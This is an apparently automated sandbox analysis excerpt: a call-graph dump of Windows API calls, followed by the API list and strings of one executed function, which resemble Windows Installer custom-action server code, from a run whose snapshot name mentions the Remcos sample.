3183->3187 3188 1f318e FreeSid 3183->3188 3186 1f315b FreeSid 3184->3186 3184->3187 3185->2969 3185->2970 3186->3187 3187->3182 3188->3187 3190 1f2e44 3189->3190 3191 1f2e54 _vsnwprintf 3190->3191 3192 1f2e74 3190->3192 3191->3192 3192->2973 3194 1f31de 3193->3194 3194->3194 3195 1f3694 3194->3195 3198 1f3618 3194->3198 3199 1f3222 3194->3199 3196 1f36a7 FreeSid 3195->3196 3197 1f36b4 AllocateAndInitializeSid 3195->3197 3196->3197 3200 1f36da 3197->3200 3201 1f3920 GetLastError 3197->3201 3202 1f362e AllocateAndInitializeSid 3198->3202 3203 1f3621 FreeSid 3198->3203 3204 1f322b 3199->3204 3205 1f3538 3199->3205 3208 1f36e3 FreeSid 3200->3208 3209 1f36f0 AllocateAndInitializeSid 3200->3209 3228 1f3928 3201->3228 3202->3201 3210 1f3654 3202->3210 3203->3202 3211 1f3234 3204->3211 3212 1f3492 3204->3212 3206 1f354e AllocateAndInitializeSid 3205->3206 3207 1f3541 FreeSid 3205->3207 3206->3201 3213 1f3574 3206->3213 3207->3206 3208->3209 3209->3201 3214 1f3715 3209->3214 3217 1f365d FreeSid 3210->3217 3218 1f366a AllocateAndInitializeSid 3210->3218 3219 1f33bf 3211->3219 3229 1f323d 3211->3229 3215 1f349b FreeSid 3212->3215 3216 1f34a8 AllocateAndInitializeSid 3212->3216 3222 1f357d FreeSid 3213->3222 3223 1f358a AllocateAndInitializeSid 3213->3223 3224 1f371e FreeSid 3214->3224 3225 1f372b AllocateAndInitializeSid 3214->3225 3215->3216 3216->3201 3226 1f34ce 3216->3226 3217->3218 3218->3195 3218->3201 3220 1f33c8 FreeSid 3219->3220 3221 1f33d5 AllocateAndInitializeSid 3219->3221 3220->3221 3221->3201 3233 1f33fa 3221->3233 3222->3223 3223->3201 3234 1f35b4 3223->3234 3224->3225 3225->3201 3255 1f3376 3225->3255 3235 1f34d7 FreeSid 3226->3235 3236 1f34e4 AllocateAndInitializeSid 3226->3236 3227 1f393b FreeSid 3227->3228 3228->3227 3237 1f3947 3228->3237 3230 1f324f FreeSid 3229->3230 3231 1f325c AllocateAndInitializeSid 3229->3231 3229->3255 3230->3231 3231->3201 3239 1f3282 3231->3239 3232 1f37ba memset 3242 1f380f InitializeAcl 3232->3242 3243 1f37e6 GlobalAlloc 3232->3243 3240 1f3403 FreeSid 3233->3240 3241 1f3410 AllocateAndInitializeSid 3233->3241 3244 1f35bd FreeSid 3234->3244 3245 1f35ca AllocateAndInitializeSid 3234->3245 3235->3236 3236->3201 3236->3255 3246 1f95e0 4 API calls 3237->3246 3238 1f3799 GetLengthSid 3238->3238 3248 1f37b0 3238->3248 3249 1f328b FreeSid 3239->3249 3250 1f3298 AllocateAndInitializeSid 3239->3250 3240->3241 3241->3201 3251 1f3436 3241->3251 3253 1f38fd GetLastError 3242->3253 3254 1f3824 3242->3254 3252 1f380b 3243->3252 3263 1f3804 3243->3263 3244->3245 3245->3201 3245->3255 3247 1f395a 3246->3247 3247->2977 3247->2978 3248->3232 3249->3250 3250->3201 3256 1f32be 3250->3256 3257 1f343f FreeSid 3251->3257 3258 1f344c AllocateAndInitializeSid 3251->3258 3252->3242 3253->3263 3259 1f382e AddAccessAllowedAce 3254->3259 3260 1f3880 InitializeSecurityDescriptor 3254->3260 3255->3232 3255->3238 3261 1f32c7 FreeSid 3256->3261 3262 1f32d4 AllocateAndInitializeSid 3256->3262 3257->3258 3258->3201 3258->3255 3259->3253 3264 1f3850 GetAce 3259->3264 3260->3253 3265 1f3891 SetSecurityDescriptorDacl 3260->3265 3261->3262 3262->3201 3266 1f32fe 3262->3266 3263->3228 3267 1f3917 GlobalFree 3263->3267 3264->3253 3264->3254 3265->3253 3268 1f38a7 SetSecurityDescriptorOwner 3265->3268 3269 1f3307 FreeSid 3266->3269 3270 1f3314 AllocateAndInitializeSid 3266->3270 3267->3228 3268->3253 3271 1f38b8 3268->3271 3269->3270 3270->3201 3274 1f333a 3270->3274 3272 1f38d1 GetSecurityDescriptorLength 3271->3272 3273 1f38c0 SetSecurityDescriptorGroup 3271->3273 3272->3263 3275 1f38e9 MakeSelfRelativeSD 3272->3275 3273->3253 3273->3272 3276 1f3343 FreeSid 3274->3276 3277 1f3350 AllocateAndInitializeSid 3274->3277 3275->3253 3275->3263 3276->3277 3277->3201 3277->3255 3279 1f5a29 3278->3279 3285 1f5ac5 3278->3285 3280 1f2f5e RegOpenKeyExW 3279->3280 3284 1f5a48 3280->3284 3281 1f5b6b 3282 1f5bda SetLastError 3281->3282 3283 1f5b77 memset 3281->3283 3289 1f95e0 4 API calls 3282->3289 3286 1f5b9b 3283->3286 3287 1f5bb6 3283->3287 3284->3285 3288 1f5a4f RegQueryValueExW 3284->3288 3285->3281 3290 1f5afd RegCreateKeyExW 3285->3290 3292 1f2e35 _vsnwprintf 3286->3292 3293 1f2e35 _vsnwprintf 3287->3293 3294 1f5aa4 RegCloseKey 3288->3294 3295 1f5a94 3288->3295 3296 1f5bee 3289->3296 3290->3281 3291 1f5b1e RegSetValueExW lstrlenW RegSetValueExW RegCloseKey 3290->3291 3291->3281 3297 1f5bb1 3292->3297 3293->3297 3294->3285 3298 1f5ab9 GlobalFree 3294->3298 3295->3294 3296->2922 3297->3282 3299 1f5bcd OutputDebugStringW 3297->3299 3298->3285 3299->3282 3301 1f864b memset 3300->3301 3302 1f8637 GlobalAlloc 3300->3302 3303 1f74fc 3301->3303 3302->3303 3303->2984 3305 1f62e3 3304->3305 3306 1f62eb memset 3305->3306 3307 1f6326 3305->3307 3308 1f2e35 _vsnwprintf 3306->3308 3311 1f95e0 4 API calls 3307->3311 3309 1f6312 3308->3309 3309->3307 3310 1f59f2 18 API calls 3309->3310 3310->3307 3312 1f6378 3311->3312 3312->3018 3312->3019 3314 1f3e28 GetProcAddress 3313->3314 3315 1f3e14 LoadLibraryW 3313->3315 3316 1f3e3a 3314->3316 3315->3314 3315->3316 3316->3024 3316->3028 3327 1f8bfd 3317->3327 3320 1f4494 3320->3093 3320->3094 3320->3097 3321 1f8cbd GetFileVersionInfoSizeW 3321->3320 3323 1f8bfd 16 API calls 3322->3323 3324 1f8ce4 3323->3324 3325 1f453f 3324->3325 3326 1f8d03 GetFileVersionInfoW 3324->3326 3325->3099 3325->3103 3326->3325 3328 1f8c1b 3327->3328 3329 1f8c32 3327->3329 3330 1f8c1d Sleep 3328->3330 3334 1f908c 14 API calls 3329->3334 3336 1f8c4e 3329->3336 3330->3330 3333 1f8c2f 3330->3333 3331 1f8c76 3331->3320 3331->3321 3332 1f8c66 GetProcAddress 3332->3331 3335 1f8c74 3332->3335 3333->3329 3334->3336 3335->3331 3336->3331 3336->3332 3337->3116 3339 1f8807 GlobalAlloc 3338->3339 3341 1f8817 3338->3341 3339->3341 3340 1f881e 3340->3126 3341->3340 3342 1f884f GlobalFree 3341->3342 3342->3340 3344 1f8885 3343->3344 3345 1f8875 3343->3345 3347 1f888f GlobalAlloc 3344->3347 3348 1f88aa 3344->3348 3345->3344 3346 1f887a GlobalFree 3345->3346 3346->3344 3347->3348 3348->3136 3350 1f86ea GlobalAlloc 3349->3350 3353 1f86fa 3349->3353 3350->3353 3351 1f8701 3351->3139 3352 1f8730 GlobalFree 3352->3351 3353->3351 3353->3352 3353->3353 3357 1f95f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3354->3357 3356 1f5ee9 3357->3356 3359 1f903e 3358->3359 3360 1f9012 3358->3360 3366 1f8f66 3359->3366 3360->3359 3362 1f9018 lstrlenW 3360->3362 3362->3359 3363 1f9024 3362->3363 3363->3359 3364 1f9086 3363->3364 3364->3174 3364->3175 3365 1f9046 3365->3364 3367 1f8f7e 3366->3367 3368 1f8ff2 GetSystemDirectoryW 3366->3368 3367->3368 3370 1f8f87 LoadLibraryW 3367->3370 3369 1f8ffe 3368->3369 3369->3365 3370->3369 3371 1f8f98 GetProcAddress 3370->3371 3372 1f8fab GetLastError 3371->3372 3373 1f8fb3 3371->3373 3374 1f8fcb FreeLibrary SetLastError 3372->3374 3373->3374 3376 1f8fd7 GetLastError 3373->3376 3374->3369 3376->3374 3378 1f8ed6 3377->3378 3379 1f8ee2 Sleep 3378->3379 3381 1f8ef4 3378->3381 3379->3378 3380 1f8f1a FreeLibrary 3382 1f7dc6 ExitProcess 3380->3382 3381->3380 3381->3381 3381->3382 3538 1f9930 3539 1f9942 3538->3539 3541 1f9950 @_EH4_CallFilterFunc@8 3538->3541 3540 1f95e0 4 API calls 3539->3540 3540->3541 3542 1f7eb0 3645 1f3c24 EnterCriticalSection 3542->3645 3544 1f7edc 3545 1f7f61 3544->3545 3546 1f7ee4 RegOpenKeyExW 3544->3546 3547 1f95e0 4 API calls 3545->3547 3548 1f7f05 RegCloseKey 3546->3548 3549 1f7f11 3546->3549 3550 1f8586 3547->3550 3548->3549 3654 1f39ae GetEnvironmentVariableW 3549->3654 3555 1f31a9 56 API calls 3556 1f7f4f 3555->3556 3557 1f7f68 3556->3557 3558 1f7f57 3556->3558 3666 1f8745 3557->3666 3558->3545 3559 1f7f5b CoUninitialize 3558->3559 3559->3545 3562 1f8745 2 API calls 3563 1f7fa9 3562->3563 3564 1f8745 2 API calls 3563->3564 3565 1f7fba 3564->3565 3566 1f8745 2 API calls 3565->3566 3567 1f7fcb 3566->3567 3568 1f8745 2 API calls 3567->3568 3569 1f7fdc 3568->3569 3570 1f84e8 3569->3570 3576 1f801e MakeAbsoluteSD 3569->3576 3571 1f84ec CoUninitialize 3570->3571 3572 1f84f2 3570->3572 3571->3572 3573 1f8513 3572->3573 3574 1f850c GlobalFree 3572->3574 3575 1f852c 3573->3575 3577 1f8525 GlobalFree 3573->3577 3574->3573 3580 1f8545 3575->3580 3583 1f853e GlobalFree 3575->3583 3578 1f8079 3576->3578 3579 1f8062 3576->3579 3577->3575 3587 1f809e 3578->3587 3608 1f80cd 3578->3608 3581 1f806c GetLastError 3579->3581 3582 1f8066 CoUninitialize 3579->3582 3584 1f855e 3580->3584 3585 1f8557 GlobalFree 3580->3585 3581->3572 3582->3581 3583->3580 3584->3545 3586 1f8570 GlobalFree 3584->3586 3585->3584 3586->3545 3588 1f59f2 18 API calls 3587->3588 3590 1f80aa GetLastError 3588->3590 3589 1f816a 3591 1f3c24 26 API calls 3589->3591 3592 1f3c24 26 API calls 3590->3592 3593 1f8178 3591->3593 3594 1f80ba 3592->3594 3593->3594 3595 1f8180 3593->3595 3594->3572 3597 1f80c2 CoUninitialize 3594->3597 3670 1f395e 3595->3670 3597->3572 3599 1f8105 3603 1f59f2 18 API calls 3599->3603 3601 1f821b 3602 1f8407 GetLastError 3601->3602 3604 1f8223 3601->3604 3605 1f8400 3602->3605 3606 1f8111 3603->3606 3613 1f8256 3604->3613 3614 1f8246 GetLastError 3604->3614 3609 1f59f2 18 API calls 3605->3609 3607 1f3c24 26 API calls 3606->3607 3607->3594 3608->3589 3608->3599 3610 1f8419 GetLastError 3609->3610 3611 1f3c24 26 API calls 3610->3611 3612 1f8429 3611->3612 3615 1f845f 3612->3615 3616 1f8437 EnterCriticalSection CloseHandle LeaveCriticalSection 3612->3616 3623 1f8276 GetLastError 3613->3623 3627 1f8286 3613->3627 3614->3605 3617 1f848f 3615->3617 3618 1f8467 EnterCriticalSection CloseHandle LeaveCriticalSection 3615->3618 3616->3615 3619 1f84bf 3617->3619 3620 1f8497 EnterCriticalSection CloseHandle LeaveCriticalSection 3617->3620 3618->3617 3621 1f84c9 3619->3621 3622 1f84c3 CoUninitialize 3619->3622 3620->3619 3624 1f84db DeleteCriticalSection 3621->3624 3625 1f3c24 26 API calls 3621->3625 3622->3621 3623->3605 3624->3572 3625->3624 3626 1f3c24 26 API calls 3626->3627 3627->3612 3627->3626 3628 1f82a7 CoRegisterClassObject 3627->3628 3629 1f82e0 3627->3629 3628->3605 3628->3627 3630 1f3c24 26 API calls 3629->3630 3638 1f82ea 3630->3638 3631 1f8333 MsgWaitForMultipleObjects 3632 1f8388 PeekMessageW 3631->3632 3631->3638 3634 1f836e TranslateMessage DispatchMessageW 3632->3634 3632->3638 3633 1f5bf0 GetModuleHandleExW GetProcAddress FreeLibrary FreeLibrary 3633->3638 3634->3632 3635 1f83e0 3637 1f3c24 26 API calls 3635->3637 3636 1f83de 3674 1f858a PostThreadMessageW 3636->3674 3637->3636 3638->3612 3638->3631 3638->3633 3638->3635 3638->3636 3639 1f3c24 26 API calls 3638->3639 3640 1f83c6 GetLastError GetLastError 3638->3640 3639->3638 3642 1f59f2 18 API calls 3640->3642 3642->3636 3643 1f83ee 3643->3612 3644 1f83f7 CoRevokeClassObject 3643->3644 3644->3612 3646 1f3c40 3645->3646 3649 1f3c47 3645->3649 3647 1f3cde LeaveCriticalSection 3646->3647 3647->3544 3648 1f3c64 SetServiceStatus 3648->3647 3652 1f3ccc GetLastError 3648->3652 3649->3648 3650 1f5bf0 4 API calls 3649->3650 3650->3648 3653 1f59f2 18 API calls 3652->3653 3653->3647 3655 1f39db 3654->3655 3656 1f95e0 4 API calls 3655->3656 3657 1f3a18 3656->3657 3658 1f3072 3657->3658 3659 1f3088 3658->3659 3660 1f3080 Sleep 3659->3660 3661 1f3090 3659->3661 3660->3659 3662 1f3099 memset 3661->3662 3663 1f30b0 3661->3663 3662->3663 3664 1f30d8 3663->3664 3675 1f2f93 GetCurrentThread OpenThreadToken 3663->3675 3664->3555 3667 1f875c GlobalAlloc 3666->3667 3668 1f8770 memset 3666->3668 3669 1f7f98 3667->3669 3668->3669 3669->3562 3671 1f397c 3670->3671 3672 1f398c InitializeCriticalSection CreateEventW CreateEventW 3670->3672 3673 1f31a9 56 API calls 3671->3673 3672->3601 3672->3602 3673->3672 3674->3643 3676 1f2fd2 GetLastError 3675->3676 3682 1f2ffa 3675->3682 3677 1f2fe3 GetCurrentProcess OpenProcessToken 3676->3677 3679 1f3054 3676->3679 3677->3679 3677->3682 3678 1f3027 AdjustTokenPrivileges CloseHandle GetLastError 3678->3679 3681 1f95e0 4 API calls 3679->3681 3680 1f3003 LookupPrivilegeValueW 3680->3682 3683 1f3065 CloseHandle 3680->3683 3684 1f3063 3681->3684 3682->3678 3682->3680 3683->3679 3684->3664 3685 1f8bb0 3688 1f8a55 3685->3688 3689 1f8a87 3688->3689 3690 1f8a73 3688->3690 3692 1f8ab9 3689->3692 3693 1f8a9c LoadLibraryW 3689->3693 3691 1f8a75 Sleep 3690->3691 3691->3689 3691->3691 3694 1f8acd 3692->3694 3695 1f8abf GetProcAddress 3692->3695 3693->3692 3695->3694 3696 1f95b0 3699 1f9a60 3696->3699 3698 1f95d0 3700 1f9a94 __except_handler4 __IsNonwritableInCurrentImage 3699->3700 3701 1f9af7 __except_handler4 3700->3701 3706 1f99d4 RtlUnwind 3700->3706 3701->3698 3703 1f9bfd 3703->3698 3704 1f9bf7 ?terminate@ 3704->3703 3705 1f9b7d __except_handler4 3705->3703 3705->3704 3707 1f99e9 3706->3707 3707->3705 3711 1f44a9 3712 1f44c6 3711->3712 3713 1f44dd GlobalAlloc 3712->3713 3714 1f44f6 3712->3714 3721 1f4596 3712->3721 3713->3714 3718 1f450e GlobalFree 3714->3718 3719 1f451b 3714->3719 3729 1f4588 3714->3729 3715 1f87d4 GlobalFree 3716 1f45aa 3715->3716 3717 1f87d4 GlobalFree 3716->3717 3720 1f45b5 3717->3720 3718->3719 3730 1f8cd0 17 API calls 3719->3730 3722 1f87d4 GlobalFree 3720->3722 3721->3715 3724 1f45c0 3722->3724 3723 1f4590 GlobalFree 3723->3721 3725 1f2e35 _vsnwprintf 3726 1f45f9 3725->3726 3728 1f2e35 _vsnwprintf 3726->3728 3726->3729 3727 1f453f 3727->3725 3727->3729 3728->3729 3729->3721 3729->3723 3730->3727 3731 1f7e20 RegisterServiceCtrlHandlerW 3732 1f7e4d 3731->3732 3733 1f7e39 GetLastError 3731->3733 3735 1f3c24 26 API calls 3732->3735 3734 1f59f2 18 API calls 3733->3734 3741 1f7e4b 3734->3741 3736 1f7e60 3735->3736 3737 1f7e64 CreateThread 3736->3737 3736->3741 3738 1f7e7e GetLastError 3737->3738 3739 1f7e90 3737->3739 3742 1f3c24 26 API calls 3738->3742 3740 1f7e9a CloseHandle 3739->3740 3739->3741 3740->3741 3742->3741 3743 1f47a0 3744 1f47ac 3743->3744 3745 1f47b7 3743->3745 3744->3745 3747 1f5991 3744->3747 3748 1f599d SetLastError 3747->3748 3751 1f59b0 3747->3751 3750 1f59a9 3748->3750 3749 1f59ca SetLastError 3749->3750 3750->3745 3751->3749 3752 1f59f0 3751->3752 3752->3748 3753 1f5020 3754 1f4cec 26 API calls 3753->3754 3755 1f5052 3754->3755 3756 1f95e0 4 API calls 3755->3756 3757 1f505f 3756->3757 3758 1f5320 3759 1f4ebd lstrlenW 3758->3759 3760 1f532d 3759->3760 3761 1f4cec 26 API calls 3760->3761 3762 1f5348 3761->3762 3777 1f85a0 3778 1f85ad 3777->3778 3779 1f85d9 3777->3779 3780 1f8605 3778->3780 3782 1f5bf0 4 API calls 3778->3782 3779->3780 3783 1f5bf0 4 API calls 3779->3783 3781 1f3c24 26 API calls 3780->3781 3791 1f8603 3781->3791 3784 1f85be 3782->3784 3785 1f85ee 3783->3785 3784->3780 3786 1f85f2 3784->3786 3787 1f85cb SetEvent 3784->3787 3785->3780 3785->3786 3788 1f3c24 26 API calls 3786->3788 3787->3780 3789 1f85fe 3788->3789 3792 1f858a PostThreadMessageW 3789->3792 3792->3791 3793 1fa220 3794 1fa22a CloseHandle 3793->3794 3795 1fa231 3793->3795 3794->3795 3805 1fa1d4 3806 1f95e0 4 API calls 3805->3806 3807 1fa1de 3806->3807 3807->3807 3808 1f94d3 3809 1f94ee 3808->3809 3810 1f94e7 _exit 3808->3810 3811 1f94f7 _cexit 3809->3811 3812 1f9502 3809->3812 3810->3809 3811->3812 3816 1fa250 3817 1fa26c 3816->3817 3818 1fa260 GlobalFree 3816->3818 3818->3817 3819 1f8b50 3820 1f8a55 3 API calls 3819->3820 3821 1f8b5f 3820->3821 3825 1f7dd0 StartServiceCtrlDispatcherW 3826 1f7dfc GetLastError 3825->3826 3827 1f7e13 3825->3827 3828 1f59f2 18 API calls 3826->3828 3829 1f7e0e 3828->3829 3830 1f3bd0 3831 1f3bdb 3830->3831 3832 1f3be4 3830->3832 3832->3831 3833 1f3c0e 3832->3833 3834 1f3c06 PostQuitMessage 3832->3834 3835 1f3c24 26 API calls 3833->3835 3834->3833 3835->3831 3839 1f5441 lstrlenW 3840 1f5480 3839->3840 3843 1f548d 3839->3843 3841 1f8665 2 API calls 3840->3841 3841->3843 3842 1f54a7 3844 1f86b2 GlobalFree 3842->3844 3843->3842 3847 1f54da CoInitialize 3843->3847 3845 1f55a9 3844->3845 3846 1f95e0 4 API calls 3845->3846 3848 1f55b8 3846->3848 3847->3842 3849 1f54fb LoadLibraryExW 3847->3849 3850 1f551b GetLastError 3849->3850 3851 1f550b SetCurrentDirectoryW 3849->3851 3852 1f5530 SetThreadToken 3850->3852 3853 1f5527 3850->3853 3851->3850 3851->3852 3854 1f553e GetLastError 3852->3854 3855 1f554a 3852->3855 3853->3852 3854->3855 3856 1f5557 GetProcAddress 3855->3856 3857 1f5571 3855->3857 3856->3857 3858 1f5565 GetLastError 3856->3858 3859 1f558c FreeLibrary 3857->3859 3860 1f5593 CoUninitialize 3857->3860 3858->3857 3859->3860 3860->3842 3861 1fa240 DeleteCriticalSection 3862 1f5640 3863 1f566e 3862->3863 3865 1f568e 3862->3865 3864 1f5673 WideCharToMultiByte 3863->3864 3863->3865 3864->3865 3866 1f8940 3867 1f88b4 16 API calls 3866->3867 3868 1f8954 3867->3868 2796 1fa17a 2797 1fa0c9 2796->2797 2799 1f915b 2797->2799 2813 1f90e9 2799->2813 2801 1f9192 2802 1f9196 LdrResolveDelayLoadedAPI 2801->2802 2803 1f91c4 2801->2803 2809 1f9267 2802->2809 2805 1f924d GetProcAddress 2803->2805 2806 1f91e1 LoadLibraryExA 2803->2806 2807 1f925f DelayLoadFailureHook 2805->2807 2808 1f9258 2805->2808 2806->2807 2810 1f91f0 2806->2810 2807->2809 2808->2809 2809->2797 2811 1f9202 2810->2811 2812 1f9240 FreeLibrary 2810->2812 2811->2805 2811->2807 2812->2811 2814 1f90fa 2813->2814 2815 1f90f6 2813->2815 2816 1f90fe 2814->2816 2817 1f9102 GetModuleHandleW 2814->2817 2815->2801 2816->2801 2818 1f9123 GetProcAddress 2817->2818 2819 1f9113 GetModuleHandleW 2817->2819 2820 1f914b 2818->2820 2821 1f9137 GetProcAddress 2818->2821 2819->2818 2819->2820 2820->2801 2821->2820 3872 1f2cf5 3875 1f9885 3872->3875 3878 1f97e2 3875->3878 3879 1f97ee 3878->3879 3880 1f97ff _onexit 3879->3880 3881 1f9815 _lock __dllonexit 3879->3881 3884 1f2cfa 3880->3884 3885 1f987c _unlock 3881->3885 3885->3884 3889 1f5070 3890 1f4ebd lstrlenW 3889->3890 3893 1f509c 3890->3893 3891 1f50a0 3900 1f95e0 4 API calls 3891->3900 3892 1f50db 3917 1f3f4c StgOpenStorage 3892->3917 3893->3891 3893->3892 3895 1f5140 3893->3895 3897 1f2e35 _vsnwprintf 3895->3897 3902 1f5163 3897->3902 3898 1f3e90 4 API calls 3903 1f5111 3898->3903 3899 1f5131 3899->3891 3901 1f51e1 memset 3899->3901 3904 1f530d 3900->3904 3906 1f521a 3901->3906 3902->3891 3907 1f4cec 26 API calls 3902->3907 3905 1f5126 3903->3905 3908 1f3f4c 6 API calls 3903->3908 3909 1f86b2 GlobalFree 3905->3909 3906->3891 3910 1f521e _wcsicmp 3906->3910 3911 1f5184 3907->3911 3908->3905 3909->3899 3910->3891 3911->3891 3912 1f3e90 4 API calls 3911->3912 3913 1f51ad 3912->3913 3914 1f51c4 3913->3914 3915 1f4cec 26 API calls 3913->3915 3916 1f86b2 GlobalFree 3914->3916 3915->3914 3916->3891 3920 1f3f81 3917->3920 3921 1f3f9c 3917->3921 3918 1f95e0 4 API calls 3919 1f41d7 3918->3919 3919->3898 3919->3899 3920->3918 3921->3920 3922 1f416f MultiByteToWideChar 3921->3922 3922->3920 3923 1f4970 3926 1f4aad 3923->3926 3927 1f4995 3923->3927 3924 1f95e0 4 API calls 3925 1f4ae0 3924->3925 3926->3924 3927->3926 3928 1f4a7d lstrcmpW 3927->3928 3928->3926 3929 1f4a8d lstrcmpW 3928->3929 3929->3926 3930 1f4a9d lstrcmpW 3929->3930 3930->3926 3934 1f92f0 __getmainargs 3935 1f3cf0 3936 1f3d0b LoadLibraryW 3935->3936 3937 1f3d23 GetProcAddress 3935->3937 3936->3937 3938 1f3d39 3936->3938 3937->3938 3942 1f5f66 3946 1f5f82 3942->3946 3943 1f60a7 3944 1f60d5 3943->3944 3945 1f60c1 memcpy 3943->3945 3945->3944 3946->3943 3946->3944 3947 1f5ff0 memcpy 3946->3947 3948 1f604f memcpy 3946->3948 3947->3946 3948->3946 3952 1f2ce5 3953 1f9885 4 API calls 3952->3953 3954 1f2cea 3953->3954 3958 1f46e0 3959 1f46eb lstrlenW 3958->3959 3961 1f4700 3958->3961 3960 1f86d5 2 API calls 3959->3960 3960->3961 3965 1f4be0 3968 1f4c0a 3965->3968 3966 1f95e0 4 API calls 3967 1f4cd2 3966->3967 3969 1f4cba 3968->3969 3970 1f3e90 4 API calls 3968->3970 3969->3966 3971 1f4c8a 3970->3971 3972 1f86b2 GlobalFree 3971->3972 3972->3969

                                                                                                                                Executed Functions

                                                                                                                                Function 001F63E3 Relevance: 217.0, APIs: 82, Strings: 41, Instructions: 1785registrywindowthreadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 001F6434
                                                                                                                                • GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 001F6456
                                                                                                                                • NtQueryInformationProcess.NTDLL ref: 001F645D
                                                                                                                                • GetCommandLineW.KERNEL32 ref: 001F649F
                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 001F64F3
                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 001F6504
                                                                                                                                • memset.MSVCRT ref: 001F652B
                                                                                                                                • memset.MSVCRT ref: 001F653D
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 001F661D
                                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 001F6649
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001F6672
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 001F667E
                                                                                                                                • CompareStringW.KERNEL32(00000409,?,00000002,?,001F1994,000000FF), ref: 001F68CA
                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,00000002,?,package,?), ref: 001F68F9
                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,00000002,?,001F17F0,000000FF), ref: 001F69BB
                                                                                                                                • memset.MSVCRT ref: 001F6B2C
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F6BA4
                                                                                                                                • lstrlenW.KERNEL32(?,00000063,?), ref: 001F6C69
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 001F6F6C
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 001F70D8
                                                                                                                                • CoRegisterClassObject.OLE32(001F25E0,001FB064,00000004,00000001,001FC6AC), ref: 001F710F
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 001F7225
                                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 001F722C
                                                                                                                                • GetLastError.KERNEL32 ref: 001F723F
                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001F7CAE
                                                                                                                                • TranslateMessage.USER32(?), ref: 001F7CD0
                                                                                                                                • DispatchMessageW.USER32(?), ref: 001F7CDE
                                                                                                                                Strings
                                                                                                                                • ServerMain (CA): Connection to Service failed., xrefs: 001F769B
                                                                                                                                • ServerMain (CA): Open synchronization event failed, xrefs: 001F7C8E
                                                                                                                                • ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type, xrefs: 001F742F
                                                                                                                                • norestart, xrefs: 001F67F4
                                                                                                                                • ServerMain (CA): Connect to remote object failed., xrefs: 001F77F8
                                                                                                                                • /qb!- REBOOTPROMPT=S, xrefs: 001F67E1
                                                                                                                                • ServerMain (CA): Create Custom Action Server failed., xrefs: 001F76CD
                                                                                                                                • ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type, xrefs: 001F7460
                                                                                                                                • OLEAUT32.dll, xrefs: 001F70DE
                                                                                                                                • OpenProcessToken failed with %d, xrefs: 001F73F1
                                                                                                                                • REBOOTPROMPT="", xrefs: 001F683B
                                                                                                                                • uninstall, xrefs: 001F6715
                                                                                                                                • ServerMain (CA): Parsing command line failed, xrefs: 001F71E1
                                                                                                                                • ServerMain (CA): Access to token failed, xrefs: 001F7250
                                                                                                                                • package, xrefs: 001F6767, 001F6795, 001F68E8
                                                                                                                                • /l*, xrefs: 001F6859
                                                                                                                                • ServerMain (CA): Error: Watch for the shutdown signal, xrefs: 001F7621
                                                                                                                                • /qn, xrefs: 001F67C3
                                                                                                                                • quiet, xrefs: 001F67B8
                                                                                                                                • ServerMain (CA): Error: Access to SD, xrefs: 001F74C5
                                                                                                                                • ServerMain (CA): Impersonation token not saved., xrefs: 001F78DD
                                                                                                                                • q, xrefs: 001F6AFA
                                                                                                                                • passive, xrefs: 001F67D6
                                                                                                                                • help, xrefs: 001F679A
                                                                                                                                • REBOOT=Force, xrefs: 001F681D
                                                                                                                                • log, xrefs: 001F684E
                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 001F65D9
                                                                                                                                • RUVEH?IJDqXFAtPYZlgmnc, xrefs: 001F6BDC, 001F6DB3, 001F6FDC
                                                                                                                                • MSIPATCHREMOVE=, xrefs: 001F6774
                                                                                                                                • ServerMain (CA): Error: Format SD, xrefs: 001F75AC
                                                                                                                                • forcerestart, xrefs: 001F6812
                                                                                                                                • promptrestart, xrefs: 001F6830
                                                                                                                                • REBOOT=ReallySuppress, xrefs: 001F67FF
                                                                                                                                • PATCH=, xrefs: 001F6710
                                                                                                                                • update, xrefs: 001F6705
                                                                                                                                • ServerMain (CA): Process not registered with service., xrefs: 001F7788
                                                                                                                                • ServerMain (CA): Wait on synchronization event failed, xrefs: 001F72E1
                                                                                                                                • ServerMain (CA): Could not open synchronization handle., xrefs: 001F77BB, 001F7ABF
                                                                                                                                • ServerMain (CA): Wrong command line, xrefs: 001F71D0
                                                                                                                                • ServerMain (CA): CoInitializeSecurity failed, xrefs: 001F75F7
                                                                                                                                • ServerMain (CA): Error: Watch for change-of-owning-process signal, xrefs: 001F764A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CompareMessageQueryStringmemset$CloseCurrentFreeGlobalProcessThreadValue$ClassCommandDispatchErrorFileHandleInformationInitializeLastLineObjectOpenRegisterTokenTranslateTypeVersionlstrlen
